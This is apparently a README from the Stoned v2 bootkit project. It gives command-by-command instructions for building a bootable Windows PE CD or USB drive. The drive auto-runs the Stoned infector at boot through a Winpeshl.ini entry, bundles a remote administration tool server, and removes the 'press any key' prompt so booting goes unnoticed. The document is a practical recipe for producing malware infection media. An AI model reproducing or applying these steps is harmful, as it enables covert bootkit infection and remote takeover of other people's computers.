
The Live CD (download link within this directory) is based on Windows PE and contains the Stoned v2 Infector. Simply download it, burn it to a CD and use it as bootable infector media!


You can also create your own Live CD:

1. Download the Windows AIK and install it
2. In the "Deployment Tools Command Prompt" execute "copype.cmd x86 c:\winpe_x86" to create the Windows PE Build Environment
3. Mount the image "Dism /Mount-Wim /WimFile:C:\winpe_x86\winpe.wim /index:1 /MountDir:C:\winpe_x86\mount"
4. Time to insert the Stoned v2 infector!

(You can use the explorer to copy the Stoned executable to \Stoned\Stoned Infector.exe or the shell:)
  1. Create a directory Stoned (in explorer) or in shell "mkdir C:\winpe_x86\mount\Stoned"
  2. Copy the Stoned infector executable "copy Infector.exe "C:\winpe_x86\mount\Stoned\Stoned Infector.exe""

That Stoned is executed, create a "Winpeshl.ini" file in the \System32 directory with following contents:

[LaunchApp]
AppPath = "%SYSTEMDRIVE%\Stoned\Stoned Infector.exe"

4.1 Insert VMware SCSI driver

Download http://www.vmware.com/download1/software/support/VMware-BusLogic-SCSIDriver-1.2.0.0.flp and extract it with WinImage.
Store it to C:\winpe_x86\Files\vmscsi

Dism /image:C:\winpe_x86\mount /Add-Driver /Driver:C:\winpe_x86\Files\vmscsi

4.2 Insert the files from "Modification Files"

  \Program Files\HxD
  \Program Files\RawReg
  \Program Files\Stoned
  \Program Files\Windows 2000 Resource Kit
  \Program Files\[Remote Administration Tool]\Server.exe

4.3 Add Language Pack

Dism /image:C:\winpe_x86\mount /Add-Package /PackagePath:"C:\Program Files\Windows AIK\Tools\PETools\x86\WinPE_FPs\winpe-fontsupport-zh-cn.cab"

Return current set language and packages:
Dism /image:c:\winpe_x86\mount /Get-Intl
Dism /image:C:\winpe_x86\mount /Get-Packages

5. Commit the changes "Dism /Unmount-Wim /MountDir:C:\winpe_x86\mount /Commit"
6. Use the Windows Image (.wim) for the Live CD "copy c:\winpe_x86\winpe.wim c:\winpe_x86\ISO\sources\boot.wim"
7. No "Press any key to boot from CD" message: "del C:\winpe_x86\ISO\boot\bootfix.bin"
8. Create the iso "oscdimg -n -bC:\winpe_x86\etfsboot.com C:\winpe_x86\ISO C:\winpe_x86\Stoned LAE.iso"
9. That's it! Burn the iso to a CD or DVD.


Note the above instructions are only valid for the Windows 7 AIK, for the Vista AIK use the imagex tool instead of dism.
You can simply use the makefiles in this directory to create a Live CD, be sure to run them from the deployment command line prompt:

 - Create with 7 AIK.cmd              Live CD, based on Windows 7 AIK
 - Create with Vista AIK.cmd          Live CD, based on Windows Vista AIK
 - Create Live USB Flash Drive.cmd    Creating a bootable USB Flash Drive (execute this after you have created a Live CD)

Do not forget to put the Infector.exe in the same directory as the scripts, because they automatically copy it to the CD image.


(C) 2009 Insecurity Systems InSec e.U.
